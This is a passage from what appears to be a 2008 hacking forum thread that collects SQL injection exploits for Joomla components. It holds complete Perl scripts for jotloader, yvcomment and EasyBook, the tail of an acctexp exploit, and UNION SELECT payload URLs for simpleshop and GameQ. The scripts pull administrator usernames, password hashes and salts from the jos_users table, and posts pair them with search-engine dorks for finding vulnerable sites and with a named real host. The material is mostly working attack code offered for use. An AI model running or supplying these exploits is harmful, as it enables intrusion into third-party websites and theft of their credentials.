        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $rid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Verify Password";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}


otmorozok428 04.06.2008 20:22

Joomla Component jotloader <= 1.2.1.a Blind SQL injection

Code:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "  o  Joomla Component jotloader Blind SQL Injection Exploit  o\n";
  print "  o  Author:His0k4 [ALGERIAN HaCkeR]                        o\n";
  print "  o                                                          o\n";
  print "  o  Conctact: His0k4.hlm[at]gamil.com                      o\n";
  print "  o  Greetz:  All friends & muslims HacKeRs                o\n";
  print "  o                                                          o\n";
  print "  o  Dork :  inurl:com_jotloader                            o\n";
  print "  o  Usage:  perl jotloader.pl host path <options>          o\n";
  print "  o  Example: perl jotloader.pl www.host.com /joomla/ -c 5  o\n";
  print "  o                                                          o\n";
  print "  o  Options:                                                o\n";
  print "  o    -c  valid cid  id                                    o\n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $cid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"c"})
{
  $cid = $options{"c"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $cid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $cid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $cid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "files.download";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-04]

ZAMUT 05.06.2008 15:37

Joomla Component EasyBook 1.1 SQL Injection Exploit
Code:

#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:                            #
# Host: artsbymonique.lu              #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--                                                      --+-\n";
print "-+--            Author: ZAMUT                            --+-\n";
print "-+--            Vuln: gbid=                              --+-\n";
print "-+--            Dork: com_easybook                        --+-\n\n";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
              "Host: www.$host\n".
              "Content-Type: application/x-www-form-urlencoded\n".
              "Content-Length: 214\n\n".
              "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
        $s = <$socket>;
        if($s=~/:::(.+):::/){
                  $lhs = $1;
                  ($l,$h,$s)=split(':',$lhs);
                  print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
                  close $socket;
                  exit; }
  }
  die ("Exploit failed!");

:) POST only

otmorozok428 05.06.2008 16:12

Joomla Component simpleshop <= 3.4 SQL injection

Quote:

/---------------------------------------------------------------\
\                                                                /
/        Joomla Component simpleshop Remote SQL injection        \
\                                                                /
\---------------------------------------------------------------/

[*] Author  : His0k4 [ALGERIAN HaCkEr]
[*] Dork    : inurl:com_simpleshop
[*] Dork    : inurl:com_simpleshop "catid"
[*] POC     : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--


------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
milw0rm.com [2008-06-05]

baltazar 08.06.2008 15:22

joomla Sql Injection Scanner V 1.0
 
http://beenuarora.com/code/joomsq.py

otmorozok428 08.06.2008 18:33

Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

Code:

/---------------------------------------------------------------\
\                                                                /
/        Joomla Component GameQ Remote SQL injection          \
\                                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--


•†•SyTiNeR•†• 09.06.2008 14:15

Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit

Code:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "  o  Joomla Component yvcomment Blind SQL Injection Exploit            o\n";
  print "  o  Author:His0k4 [ALGERIAN HaCkeR]                                  o\n";
  print "  o                                                                    o\n";
  print "  o  Conctact: His0k4.hlm[at]gamil.com                                o\n";
  print "  o  Greetz:  All friends & muslims HacKeRs                          o\n";
  print "  o                                                                    o\n";
  print "  o  Dork :  inurl:yvcomment                                          o\n";
  print "  o  Usage:  perl yvcomment.pl host path <options>                    o\n";
  print "  o  Example: perl yvcomment.pl www.host.com /joomla/ -a 2            o\n";
  print "  o                                                                    o\n";
  print "  o  Options:                                                          o\n";
  print "  o    -a  valid Article id                                          o\n";
  print "  o  Note:                                                            o\n";
  print "  o You can Change the match string by any content of the correct query o\n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $aid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "DateAndAuthor";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-08]


